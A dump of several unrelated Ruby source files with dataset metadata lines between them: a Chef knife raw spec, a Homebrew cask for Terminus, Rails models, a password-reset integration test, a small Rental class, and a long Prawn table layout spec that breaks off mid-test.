"normal": {
},
"default": {
},
"automatic": {
},
"run_list": [
]
}
EOM
end
it 'knife raw /blarghle returns 404' do
knife('raw /blarghle').should_fail(/ERROR: Server responded with error 404 "Not Found\s*"/)
end
it 'knife raw -m DELETE /roles/x succeeds', :pending => (RUBY_VERSION < "1.9") do
knife('raw -m DELETE /roles/x').should_succeed <<EOM
{
"name": "x",
"description": "",
"json_class": "Chef::Role",
"chef_type": "role",
"default_attributes": {
},
"override_attributes": {
},
"run_list": [
],
"env_run_lists": {
}
}
EOM
knife('show /roles/x.json').should_fail "ERROR: /roles/x.json: No such file or directory\n"
end
it 'knife raw -m PUT -i blah.txt /roles/x succeeds', :pending => (RUBY_VERSION < "1.9") do
Tempfile.open('raw_put_input') do |file|
file.write <<EOM
{
"name": "x",
"description": "eek",
"json_class": "Chef::Role",
"chef_type": "role",
"default_attributes": {
},
"override_attributes": {
},
"run_list": [
],
"env_run_lists": {
}
}
EOM
file.close
knife("raw -m PUT -i #{file.path} /roles/x").should_succeed <<EOM
{
"name": "x",
"description": "eek",
"json_class": "Chef::Role",
"chef_type": "role",
"default_attributes": {
},
"override_attributes": {
},
"run_list": [
],
"env_run_lists": {
}
}
EOM
knife('show /roles/x.json').should_succeed <<EOM
/roles/x.json:
{
"name": "x",
"description": "eek"
}
EOM
end
end
it 'knife raw -m POST -i blah.txt /roles succeeds', :pending => (RUBY_VERSION < "1.9") do
Tempfile.open('raw_put_input') do |file|
file.write <<EOM
{
"name": "y",
"description": "eek",
"json_class": "Chef::Role",
"chef_type": "role",
"default_attributes": {
},
"override_attributes": {
},
"run_list": [
],
"env_run_lists": {
}
}
EOM
file.close
knife("raw -m POST -i #{file.path} /roles").should_succeed <<EOM
{
"uri": "#{ChefZeroSupport::Server.server.url}/roles/y"
}
EOM
knife('show /roles/y.json').should_succeed <<EOM
/roles/y.json:
{
"name": "y",
"description": "eek"
}
EOM
end
end
context 'When a server returns raw json' do
before :each do
Chef::Config.chef_server_url = "http://localhost:9018"
app = lambda do |env|
[200, {'Content-Type' => 'application/json' }, ['{ "x": "y", "a": "b" }'] ]
end
@raw_server, @raw_server_thread = start_app_server(app, 9018)
end
after :each do
@raw_server.shutdown if @raw_server
@raw_server_thread.kill if @raw_server_thread
end
it 'knife raw /blah returns the prettified json', :pending => (RUBY_VERSION < "1.9") do
knife('raw /blah').should_succeed <<EOM
{
"x": "y",
"a": "b"
}
EOM
end
it 'knife raw --no-pretty /blah returns the raw json' do
knife('raw --no-pretty /blah').should_succeed <<EOM
{ "x": "y", "a": "b" }
EOM
end
end
context 'When a server returns text' do
before :each do
Chef::Config.chef_server_url = "http://localhost:9018"
app = lambda do |env|
[200, {'Content-Type' => 'text' }, ['{ "x": "y", "a": "b" }'] ]
end
@raw_server, @raw_server_thread = start_app_server(app, 9018)
end
after :each do
@raw_server.shutdown if @raw_server
@raw_server_thread.kill if @raw_server_thread
end
it 'knife raw /blah returns the raw text' do
knife('raw /blah').should_succeed(<<EOM)
{ "x": "y", "a": "b" }
EOM
end
it 'knife raw --no-pretty /blah returns the raw text' do
knife('raw --no-pretty /blah').should_succeed(<<EOM)
{ "x": "y", "a": "b" }
EOM
end
end
end
end
| 21.790123 | 97 | 0.594145 |
01a51d31084425d0ac745ed5aca376f591c0eab1 | 750 | cask 'terminus' do
version '1.0.82'
sha256 '2e00b814031e1bef2ced9aa49c4ed87c3fee21545a038259553dbd34f48c98af'
# github.com/Eugeny/terminus was verified as official when first introduced to the cask
url "https://github.com/Eugeny/terminus/releases/download/v#{version}/terminus-#{version}-macos.dmg"
appcast 'https://github.com/Eugeny/terminus/releases.atom'
name 'Terminus'
homepage 'https://eugeny.github.io/terminus/'
app 'Terminus.app'
zap trash: [
'~/Library/Application Support/terminus',
'~/Library/Preferences/org.terminus.helper.plist',
'~/Library/Preferences/org.terminus.plist',
'~/Library/Saved Application State/org.terminus.savedState',
]
end
| 37.5 | 102 | 0.693333 |
08daf6d0ff91e1a88c0330f1c2120cd6e7d10052 | 1,839 | # Copyright © 2011-2020 MUSC Foundation for Research Development
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
# SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class IrbRecord < ApplicationRecord
include RemotelyNotifiable
belongs_to :human_subjects_info
has_and_belongs_to_many :study_phases
has_one :protocol, through: :human_subjects_info
validates_presence_of :pro_number
def study_phase_values
study_phases.pluck(:phase)
end
end
| 51.083333 | 145 | 0.805329 |
e96196b6a25db812f9934761cb7defe2b3d3756d | 4,359 | require "test_helper"
require "support/password_helpers"
class PasswordResetTest < ActionDispatch::IntegrationTest
include PasswordHelpers
include ActiveJob::TestHelper
BLANKET_RESET_MESSAGE = "If your email address is recognised, you’ll receive an email with instructions about how to reset your password.".freeze
should "email password reset instructions and allow the user to set a new one" do
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
user.reload
assert user.valid_password?(new_password)
end
end
should "not allow password reset for unaccepted invitations" do
perform_enqueued_jobs do
user = create(:user, invitation_sent_at: Time.zone.now, invitation_accepted_at: nil)
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Your GOV.UK Signon development account has not been activated", current_email.subject
end
end
should "not allow password reset for suspended users" do
perform_enqueued_jobs do
user = create(:suspended_user)
trigger_reset_for(user.email)
assert_response_contains(BLANKET_RESET_MESSAGE)
open_email(user.email)
assert current_email
assert_equal "Your GOV.UK Signon development account has been suspended", current_email.subject
end
end
should "not give away whether an email exists in the system or not" do
trigger_reset_for("[email protected]")
assert_not page.has_content?("Email not found"), page.body
assert_response_contains(BLANKET_RESET_MESSAGE)
end
should "not allow a reset link to be used more than once" do
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
signout
current_email.find_link(href: false).click
assert_response_contains("Sorry, this link doesn't work")
end
end
should "not be broken by virus-scanners that follow links in emails" do
# Some users have virus-scanning systems that follow links in emails to
# check for anything malicious. This was breaking this flow because the
# token was being reset the first time the page was accessed (introduced in
# a044b79).
perform_enqueued_jobs do
user = create(:user)
new_password = "some v3ry s3cure password"
trigger_reset_for(user.email)
open_email(user.email)
assert current_email
assert_equal "Reset password instructions", current_email.subject
# simulate something following the link in the email.
current_email.find_link(href: false).click
complete_password_reset(current_email, new_password: new_password)
assert_response_contains("Your password was changed successfully")
end
end
should "show error messages when password reset doesn't work" do
perform_enqueued_jobs do
user = create(:user)
trigger_reset_for(user.email)
open_email(user.email)
current_email.find_link(href: false).click
fill_in "New password", with: "A Password"
fill_in "Confirm new password", with: "Not That Password"
click_button "Save password"
assert_response_contains("Password confirmation doesn't match")
end
end
should "return a 429 response if too many requests are made" do
Rack::Attack.enabled = true
Rack::Attack.cache.store = ActiveSupport::Cache::MemoryStore.new
user = create(:user)
100.times { trigger_reset_for(user.email) }
assert_response_contains("Too many requests.")
Rack::Attack.enabled = false
end
end
| 32.529851 | 147 | 0.738013 |
395a20ba9e3e40a24df6bc9f8be27360a7b797f8 | 440 | require 'json'
class Rental
attr_accessor :date, :book, :person
def initialize(date, book, person)
@date = date
@book = book
book.rentals << self
@person = person
person.rentals << self
end
def to_s
"Date: #{@date}, Book \"#{book.title}\" by #{book.author}"
end
def to_json(_options = {})
{
'date' => @date,
'book' => @book.to_json,
'person' => @person.to_json
}
end
end
| 16.296296 | 62 | 0.563636 |
28a817e1d582b8e57039ca94eb90c601a61e744d | 389 | # require FinancialAssistance::Engine.root.join('app', 'domain', 'types.rb')
FinancialAssistanceRegistry = ResourceRegistry::Registry.new
FinancialAssistanceRegistry.configure do |config|
config.name = :enroll
config.created_at = DateTime.now
config.load_path = "#{Rails.root.to_s.gsub('/components/financial_assistance/spec/dummy', '')}/system/config/templates/features"
end | 43.222222 | 130 | 0.771208 |
334a9aa5ab906f8fbaae859a370e73ad0b1ecc65 | 34,152 | # encoding: utf-8
require File.join(File.expand_path(File.dirname(__FILE__)), "spec_helper")
require 'set'
describe "Prawn::Table" do
describe "converting data to Cell objects" do
before(:each) do
@pdf = Prawn::Document.new
@table = @pdf.table([%w[R0C0 R0C1], %w[R1C0 R1C1]])
end
it "should return a Prawn::Table" do
@table.should.be.an.instance_of Prawn::Table
end
it "should flatten the data into the @cells array in row-major order" do
@table.cells.map { |c| c.content }.should == %w[R0C0 R0C1 R1C0 R1C1]
end
it "should add row and column numbers to each cell" do
c = @table.cells.to_a.first
c.row.should == 0
c.column.should == 0
end
it "should allow empty fields" do
lambda {
data = [["foo","bar"],["baz",""]]
@pdf.table(data)
}.should.not.raise
end
it "should allow a table with a header but no body" do
lambda { @pdf.table([["Header"]], :header => true) }.should.not.raise
end
it "should accurately count columns from data" do
# First data row may contain colspan which would hide true column count
data = [["Name:", {:content => "Some very long name", :colspan => 5}]]
pdf = Prawn::Document.new
table = Prawn::Table.new data, pdf
table.column_widths.length.should == 6
end
end
describe "#initialize" do
before(:each) do
@pdf = Prawn::Document.new
end
it "should instance_eval a 0-arg block" do
initializer = mock()
initializer.expects(:kick).once
@pdf.table([["a"]]){
self.should.be.an.instance_of(Prawn::Table); initializer.kick }
end
it "should call a 1-arg block with the document as the argument" do
initializer = mock()
initializer.expects(:kick).once
@pdf.table([["a"]]){ |doc|
doc.should.be.an.instance_of(Prawn::Table); initializer.kick }
end
it "should proxy cell methods to #cells" do
table = @pdf.table([["a"]], :cell_style => { :padding => 11 })
table.cells[0, 0].padding.should == [11, 11, 11, 11]
end
it "should set row and column length" do
table = @pdf.table([["a", "b", "c"], ["d", "e", "f"]])
table.row_length.should == 2
table.column_length.should == 3
end
it "should generate a text cell based on a String" do
t = @pdf.table([["foo"]])
t.cells[0,0].should.be.a.kind_of(Prawn::Table::Cell::Text)
end
it "should pass through a text cell" do
c = Prawn::Table::Cell::Text.new(@pdf, [0,0], :content => "foo")
t = @pdf.table([[c]])
t.cells[0,0].should == c
end
end
describe "cell accessors" do
before(:each) do
@pdf = Prawn::Document.new
@table = @pdf.table([%w[R0C0 R0C1], %w[R1C0 R1C1]])
end
it "should select rows by number or range" do
Set.new(@table.row(0).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1])
Set.new(@table.rows(0..1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select rows by array" do
Set.new(@table.rows([0, 1]).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow negative row selectors" do
Set.new(@table.row(-1).map { |c| c.content }).should ==
Set.new(%w[R1C0 R1C1])
Set.new(@table.rows(-2..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
Set.new(@table.rows(0..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select columns by number or range" do
Set.new(@table.column(0).map { |c| c.content }).should ==
Set.new(%w[R0C0 R1C0])
Set.new(@table.columns(0..1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should select columns by array" do
Set.new(@table.columns([0, 1]).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow negative column selectors" do
Set.new(@table.column(-1).map { |c| c.content }).should ==
Set.new(%w[R0C1 R1C1])
Set.new(@table.columns(-2..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
Set.new(@table.columns(0..-1).map { |c| c.content }).should ==
Set.new(%w[R0C0 R0C1 R1C0 R1C1])
end
it "should allow rows and columns to be combined" do
@table.row(0).column(1).map { |c| c.content }.should == ["R0C1"]
end
it "should accept a filter block, returning a cell proxy" do
@table.cells.filter { |c| c.content =~ /R0/ }.column(1).map{ |c|
c.content }.should == ["R0C1"]
end
it "should accept the [] method, returning a Cell or nil" do
@table.cells[0, 0].content.should == "R0C0"
@table.cells[12, 12].should.be.nil
end
it "should proxy unknown methods to the cells" do
@table.cells.height = 200
@table.row(1).height = 100
@table.cells[0, 0].height.should == 200
@table.cells[1, 0].height.should == 100
end
it "should ignore non-setter methods" do
lambda {
@table.cells.content_width
}.should.raise(NoMethodError)
end
it "should accept the style method, proxying its calls to the cells" do
@table.cells.style(:height => 200, :width => 200)
@table.column(0).style(:width => 100)
@table.cells[0, 1].width.should == 200
@table.cells[1, 0].height.should == 200
@table.cells[1, 0].width.should == 100
end
it "style method should accept a block, passing each cell to be styled" do
@table.cells.style { |c| c.height = 200 }
@table.cells[0, 1].height.should == 200
end
it "should return the width of selected columns for #width" do
c0_width = @table.column(0).map{ |c| c.width }.max
c1_width = @table.column(1).map{ |c| c.width }.max
@table.column(0).width.should == c0_width
@table.column(1).width.should == c1_width
@table.columns(0..1).width.should == c0_width + c1_width
@table.cells.width.should == c0_width + c1_width
end
it "should return the height of selected rows for #height" do
r0_height = @table.row(0).map{ |c| c.height }.max
r1_height = @table.row(1).map{ |c| c.height }.max
@table.row(0).height.should == r0_height
@table.row(1).height.should == r1_height
@table.rows(0..1).height.should == r0_height + r1_height
@table.cells.height.should == r0_height + r1_height
end
end
describe "layout" do
before(:each) do
@pdf = Prawn::Document.new
@long_text = "The quick brown fox jumped over the lazy dogs. " * 5
end
describe "width" do
it "should raise an error if the given width is outside of range" do
lambda do
@pdf.table([["foo"]], :width => 1)
end.should.raise(Prawn::Errors::CannotFit)
lambda do
@pdf.table([[@long_text]], :width => @pdf.bounds.width + 100)
end.should.raise(Prawn::Errors::CannotFit)
end
it "should accept the natural width for small tables" do
pad = 10 # default padding
@table = @pdf.table([["a"]])
@table.width.should == @table.cells[0, 0].natural_content_width + pad
end
it "width should equal sum(column_widths)" do
table = Prawn::Table.new([%w[ a b c ], %w[d e f]], @pdf) do
column(0).width = 50
column(1).width = 100
column(2).width = 150
end
table.width.should == 300
end
it "should accept Numeric for column_widths" do
table = Prawn::Table.new([%w[ a b c ], %w[d e f]], @pdf) do |t|
t.column_widths = 50
end
table.width.should == 150
end
it "should calculate unspecified column widths as "+
"(max(string_width) + 2*horizontal_padding)" do
hpad, fs = 3, 12
columns = 2
table = Prawn::Table.new( [%w[ foo b ], %w[d foobar]], @pdf,
:cell_style => { :padding => hpad, :size => fs } )
col0_width = @pdf.width_of("foo", :size => fs)
col1_width = @pdf.width_of("foobar", :size => fs)
table.width.should == col0_width + col1_width + 2*columns*hpad
end
it "should allow mixing autocalculated and preset"+
"column widths within a single table" do
hpad, fs = 10, 6
stretchy_columns = 2
col0_width = 50
col1_width = @pdf.width_of("foo", :size => fs)
col2_width = @pdf.width_of("foobar", :size => fs)
col3_width = 150
table = Prawn::Table.new( [%w[snake foo b apple],
%w[kitten d foobar banana]], @pdf,
:cell_style => { :padding => hpad, :size => fs }) do
column(0).width = col0_width
column(3).width = col3_width
end
table.width.should == col1_width + col2_width +
2*stretchy_columns*hpad +
col0_width + col3_width
end
it "should preserve all manually requested column widths" do
col0_width = 50
col1_width = 20
col3_width = 60
table = Prawn::Table.new( [["snake", "foo", "b",
"some long, long text that will wrap"],
%w[kitten d foobar banana]], @pdf,
:width => 150) do
column(0).width = col0_width
column(1).width = col1_width
column(3).width = col3_width
end
table.draw
table.column(0).width.should == col0_width
table.column(1).width.should == col1_width
table.column(3).width.should == col3_width
end
it "should not exceed the maximum width of the margin_box" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf)
table.width.should == expected_width
end
it "should not exceed the maximum width of the margin_box even with" +
"manual widths specified" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf) { column(1).width = 100 }
table.width.should == expected_width
end
it "scales down only the non-preset column widths when the natural width" +
"exceeds the maximum width of the margin_box" do
expected_width = @pdf.margin_box.width
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf) { column(1).width = 100; column(3).width = 50 }
table.width.should == expected_width
table.column_widths[1].should == 100
table.column_widths[3].should == 50
end
it "should allow width to be reset even after it has been calculated" do
@table = @pdf.table([[@long_text]])
@table.width
@table.width = 100
@table.width.should == 100
end
it "should shrink columns evenly when two equal columns compete" do
@table = @pdf.table([["foo", @long_text], [@long_text, "foo"]])
@table.cells[0, 0].width.should == @table.cells[0, 1].width
end
it "should grow columns evenly when equal deficient columns compete" do
@table = @pdf.table([["foo", "foobar"], ["foobar", "foo"]], :width => 500)
@table.cells[0, 0].width.should == @table.cells[0, 1].width
end
it "should respect manual widths" do
@table = @pdf.table([%w[foo bar baz], %w[baz bar foo]], :width => 500) do
column(1).width = 60
end
@table.column(1).width.should == 60
@table.column(0).width.should == @table.column(2).width
end
it "should allow table cells to be resized in block" do
lambda do
@pdf.table([%w[1 2 3 4 5]]) do |t|
t.width = 40
t.cells.size = 8
t.cells.padding = 0
end
end.should.not.raise(Prawn::Errors::CannotFit)
end
it "should be the width of the :width parameter" do
expected_width = 300
table = Prawn::Table.new( [%w[snake foo b apple],
%w[kitten d foobar banana]], @pdf,
:width => expected_width)
table.width.should == expected_width
end
it "should not exceed the :width option" do
expected_width = 400
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf, :width => expected_width)
table.width.should == expected_width
end
it "should not exceed the :width option even with manual widths specified" do
expected_width = 400
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf, :width => expected_width) do
column(1).width = 100
end
table.width.should == expected_width
end
it "should calculate unspecified column widths even " +
"with colspan cells declared" do
pdf = Prawn::Document.new
hpad, fs = 3, 5
columns = 3
data = [ [ { :content => 'foo', :colspan => 2 }, "foobar" ],
[ "foo", "foo", "foo" ] ]
table = Prawn::Table.new( data, pdf,
:cell_style => {
:padding_left => hpad, :padding_right => hpad,
:size => fs
})
col0_width = pdf.width_of("foo", :size => fs) # cell 1, 0
col1_width = pdf.width_of("foo", :size => fs) # cell 1, 1
col2_width = pdf.width_of("foobar", :size => fs) # cell 0, 1 (at col 2)
table.width.should == col0_width + col1_width +
col2_width + 2*columns*hpad
end
end
describe "height" do
it "should set all cells in a row to the same height" do
@table = @pdf.table([["foo", @long_text]])
@table.cells[0, 0].height.should == @table.cells[0, 1].height
end
it "should move y-position to the bottom of the table after drawing" do
old_y = @pdf.y
table = @pdf.table([["foo"]])
@pdf.y.should == old_y - table.height
end
it "should not wrap unnecessarily" do
# Test for FP errors and glitches
t = @pdf.table([["Bender Bending Rodriguez"]])
h = @pdf.height_of("one line")
(t.height - 10).should.be < h*1.5
end
it "should have a height of n rows" do
data = [["foo"],["bar"],["baaaz"]]
vpad = 4
origin = @pdf.y
@pdf.table data, :cell_style => { :padding => vpad }
table_height = origin - @pdf.y
font_height = @pdf.font.height
line_gap = @pdf.font.line_gap
num_rows = data.length
table_height.should.be.close(
num_rows * font_height + 2*vpad*num_rows, 0.001 )
end
end
describe "position" do
it "should center tables with :position => :center" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = (@pdf.bounds.width - 500) / 2.0
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => :center)
end
it "should right-align tables with :position => :right" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = @pdf.bounds.width - 500
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => :right)
end
it "should accept a Numeric" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = 123
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => 123)
end
it "should raise an ArgumentError on unknown :position" do
lambda do
@pdf.table([["foo"]], :position => :bratwurst)
end.should.raise(ArgumentError)
end
end
end
describe "Multi-page tables" do
it "should flow to the next page when hitting the bottom of the bounds" do
Prawn::Document.new { table([["foo"]] * 30) }.page_count.should == 1
Prawn::Document.new { table([["foo"]] * 31) }.page_count.should == 2
Prawn::Document.new { table([["foo"]] * 31); table([["foo"]] * 35) }.
page_count.should == 3
end
it "should respect the containing bounds" do
Prawn::Document.new do
bounding_box([0, cursor], :width => bounds.width, :height => 72) do
table([["foo"]] * 4)
end
end.page_count.should == 2
end
it "should not start a new page before finishing out a row" do
Prawn::Document.new do
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end.page_count.should == 1
end
it "should only start new page on long cells if it would gain us height" do
Prawn::Document.new do
text "Hello"
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end.page_count.should == 2
end
it "should not start a new page to gain height when at the top of " +
"a bounding box, even if stretchy" do
Prawn::Document.new do
bounding_box([bounds.left, bounds.top - 20], :width => 400) do
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end
end.page_count.should == 1
end
it "should still break to the next page if in a stretchy bounding box " +
"but not at the top" do
Prawn::Document.new do
bounding_box([bounds.left, bounds.top - 20], :width => 400) do
text "Hello"
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end
end.page_count.should == 2
end
it "should only draw first-page header if the first body row fits" do
pdf = Prawn::Document.new
pdf.y = 60 # not enough room for a table row
pdf.table [["Header"], ["Body"]], :header => true
output = PDF::Inspector::Page.analyze(pdf.render)
# Ensure we only drew the header once, on the second page
output.pages[0][:strings].should.be.empty
output.pages[1][:strings].should == ["Header", "Body"]
end
it "should draw background before borders, but only within pages" do
seq = sequence("drawing_order")
@pdf = Prawn::Document.new
# give enough room for only the first row
@pdf.y = @pdf.bounds.absolute_bottom + 30
t = @pdf.make_table([["A", "B"],
["C", "D"]],
:cell_style => {:background_color => 'ff0000'})
ca = t.cells[0, 0]
cb = t.cells[0, 1]
cc = t.cells[1, 0]
cd = t.cells[1, 1]
# All backgrounds should draw before any borders on page 1...
ca.expects(:draw_background).in_sequence(seq)
cb.expects(:draw_background).in_sequence(seq)
ca.expects(:draw_borders).in_sequence(seq)
cb.expects(:draw_borders).in_sequence(seq)
# ...and page 2
@pdf.expects(:start_new_page).in_sequence(seq)
cc.expects(:draw_background).in_sequence(seq)
cd.expects(:draw_background).in_sequence(seq)
cc.expects(:draw_borders).in_sequence(seq)
cd.expects(:draw_borders).in_sequence(seq)
t.draw
end
end
describe "#style" do
it "should send #style to its first argument, passing the style hash and" +
" block" do
stylable = stub()
stylable.expects(:style).with(:foo => :bar).once.yields
block = stub()
block.expects(:kick).once
Prawn::Document.new do
table([["x"]]) { style(stylable, :foo => :bar) { block.kick } }
end
end
it "should default to {} for the hash argument" do
stylable = stub()
stylable.expects(:style).with({}).once
Prawn::Document.new do
table([["x"]]) { style(stylable) }
end
end
end
describe "row_colors" do
it "should allow array syntax for :row_colors" do
data = [["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
t = pdf.table(data, :row_colors => ['cccccc', 'ffffff'])
t.cells.map{|x| x.background_color}.should == %w[cccccc ffffff cccccc]
end
it "should ignore headers" do
data = [["header"], ["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
t = pdf.table(data, :header => true,
:row_colors => ['cccccc', 'ffffff']) do
row(0).background_color = '333333'
end
t.cells.map{|x| x.background_color}.should ==
%w[333333 cccccc ffffff cccccc]
end
it "stripes rows consistently from page to page, skipping header rows" do
data = [["header"]] + [["foo"]] * 70
pdf = Prawn::Document.new
t = pdf.make_table(data, :header => true,
:row_colors => ['cccccc', 'ffffff']) do
cells.padding = 0
cells.size = 9
row(0).size = 11
end
# page 1: header + 67 cells (odd number -- verifies that the next
# page disrupts the even/odd coloring, since both the last data cell
# on this page and the first one on the next are colored cccccc)
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } ==
[nil] + (%w[cccccc ffffff] * 33) + %w[cccccc]
end
# page 2: header
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } == [nil]
end
# page 2: 3 data cells
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } ==
%w[cccccc ffffff cccccc]
end
t.draw
end
it "should not override an explicit background_color" do
data = [["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
table = pdf.table(data, :row_colors => ['cccccc', 'ffffff']) { |t|
t.cells[0, 0].background_color = 'dddddd'
}
table.cells.map{|x| x.background_color}.should == %w[dddddd ffffff cccccc]
end
end
describe "inking" do
before(:each) do
@pdf = Prawn::Document.new
end
it "should set the x-position of each cell based on widths" do
@table = @pdf.table([["foo", "bar", "baz"]])
x = 0
(0..2).each do |col|
cell = @table.cells[0, col]
cell.x.should == x
x += cell.width
end
end
it "should set the y-position of each cell based on heights" do
y = 0
@table = @pdf.make_table([["foo"], ["bar"], ["baz"]])
(0..2).each do |row|
cell = @table.cells[row, 0]
cell.y.should.be.close(y, 0.01)
y -= cell.height
end
end
it "should output content cell by cell, row by row" do
data = [["foo","bar"],["baz","bang"]]
@pdf = Prawn::Document.new
@pdf.table(data)
output = PDF::Inspector::Text.analyze(@pdf.render)
output.strings.should == data.flatten
end
it "should not cause an error if rendering the very first row causes a " +
"page break" do
Prawn::Document.new do
arr = Array(1..5).collect{|i| ["cell #{i}"] }
move_down( y - (bounds.absolute_bottom + 3) )
lambda {
table(arr)
}.should.not.raise
end
end
it "should draw all backgrounds before any borders" do
# lest backgrounds overlap borders:
# https://github.com/sandal/prawn/pull/226
seq = sequence("drawing_order")
t = @pdf.make_table([["A", "B"]],
:cell_style => {:background_color => 'ff0000'})
ca = t.cells[0, 0]
cb = t.cells[0, 1]
# XXX Not a perfectly general test, because it would still be acceptable
# if we drew B then A
ca.expects(:draw_background).in_sequence(seq)
cb.expects(:draw_background).in_sequence(seq)
ca.expects(:draw_borders).in_sequence(seq)
cb.expects(:draw_borders).in_sequence(seq)
t.draw
end
it "should allow multiple inkings of the same table" do
pdf = Prawn::Document.new
t = Prawn::Table.new([["foo"]], pdf)
pdf.expects(:bounding_box).with{|(x, y), options| y.to_i == 495}.yields
pdf.expects(:bounding_box).with{|(x, y), options| y.to_i == 395}.yields
pdf.expects(:draw_text!).with{ |text, options| text == 'foo' }.twice
pdf.move_cursor_to(500)
t.draw
pdf.move_cursor_to(400)
t.draw
end
describe "in stretchy bounding boxes" do
it "should draw all cells on a row at the same y-position" do
pdf = Prawn::Document.new
text_y = pdf.y.to_i - 5 # text starts 5pt below current y pos (padding)
pdf.bounding_box([0, pdf.cursor], :width => pdf.bounds.width) do
pdf.expects(:draw_text!).checking { |text, options|
pdf.bounds.absolute_top.should == text_y
}.times(3)
pdf.table([%w[a b c]])
end
end
end
end
describe "headers" do
it "should add headers to output when specified" do
data = [["a", "b"], ["foo","bar"],["baz","bang"]]
@pdf = Prawn::Document.new
@pdf.table(data, :header => true)
output = PDF::Inspector::Text.analyze(@pdf.render)
output.strings.should == data.flatten
end
it "should repeat headers across pages" do
data = [["foo","bar"]] * 30
headers = ["baz","foobar"]
@pdf = Prawn::Document.new
@pdf.table([headers] + data, :header => true)
output = PDF::Inspector::Text.analyze(@pdf.render)
output.strings.should == headers + data.flatten[0..-3] + headers +
data.flatten[-2..-1]
end
it "should not draw header twice when starting new page" do
@pdf = Prawn::Document.new
@pdf.y = 0
@pdf.table([["Header"], ["Body"]], :header => true)
output = PDF::Inspector::Text.analyze(@pdf.render)
output.strings.should == ["Header", "Body"]
end
end
describe "nested tables" do
before(:each) do
@pdf = Prawn::Document.new
@subtable = Prawn::Table.new([["foo"]], @pdf)
@table = @pdf.table([[@subtable, "bar"]])
end
it "can be created from an Array" do
cell = Prawn::Table::Cell.make(@pdf, [["foo"]])
